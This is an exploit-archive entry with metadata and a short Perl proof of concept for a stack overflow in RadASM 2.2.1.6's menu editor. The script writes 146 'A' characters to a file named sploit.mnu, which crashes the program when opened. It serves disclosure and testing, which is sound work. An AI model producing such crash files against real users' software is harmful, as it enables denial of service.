RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)

Author: Pankaj Kohli
type: dos
platform: windows
port: 
date_added: 2009-08-03  
date_updated:   
verified: 1  
codes: OSVDB-56731  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9361.pl  
# RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC
# Coded by Pankaj Kohli
# http://www.pank4j.com

$str="A"x146;
$file="sploit.mnu";
open(my $FILE, ">>$file") or die "Error opening file.n";
print $FILE $str ;
close($FILE);
print "$file has been created.n";

# milw0rm.com [2009-08-04]